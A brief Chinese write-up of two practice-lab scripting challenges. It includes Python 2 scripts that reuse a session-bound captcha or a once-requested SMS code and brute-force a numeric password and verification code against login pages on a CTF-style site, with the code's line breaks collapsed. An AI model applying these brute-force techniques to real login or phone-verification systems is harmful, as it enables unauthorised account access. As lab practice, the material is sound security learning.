闲着无事跟着某同学在上做两道脚本题练手 就是模拟POST发包而已

 

　　4-大致上是每次访问index.php相对应一个验证码,只要不重新访问这个页面,用同一个验证码即可。于是代码模拟访问这个页面，获取cookie,再暴力密码post

　　11-思路相近,查看源码推测是post到vcode.php对应一个验证码,所以暴力之前post到这个php一次　　

　　　　PS:需要暴力两个电话号码

　　

#!/bin/env pythonimport urllib, urllib2, cookielibcj = cookielib.CookieJar()opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))urllib2.install_opener(opener)response = urllib2.urlopen('http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php')print response.read()username="admin"pwd=1vcode=""submit="submit"vcode = raw_input()data = {
   'username': username,        'pwd':  pwd,        'vcode': vcode,        'submit': submit,        }for i in range(10000, 1000, -1):    data['pwd'] = i    f = urllib2.urlopen(        url = 'http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php',        data = urllib.urlencode(data),        )    if 'error' not in f.read():        print 'answer is %d' % i        break

#!/bin/env pythonimport urllib, urllib2, cookielibcj = cookielib.CookieJar()opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))urllib2.install_opener(opener)response = urllib2.urlopen('http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/#')print response.read()response = urllib2.urlopen(        url = 'http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/vcode.php',        data = urllib.urlencode({
   'getcode':1, 'mobi':13399999999})        )print response.read()username="13399999999"vcode=""submit="submit"data = {
   'username': username,        'vcode': vcode,        'Login': submit,        }for i in range(100, 1000):    data['vcode'] = i    f = urllib2.urlopen(        url = 'http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/login.php',        data = urllib.urlencode(data),        )    print f.read()    """    if 'error' not in f.read():        print 'answer is %d' % i        break    """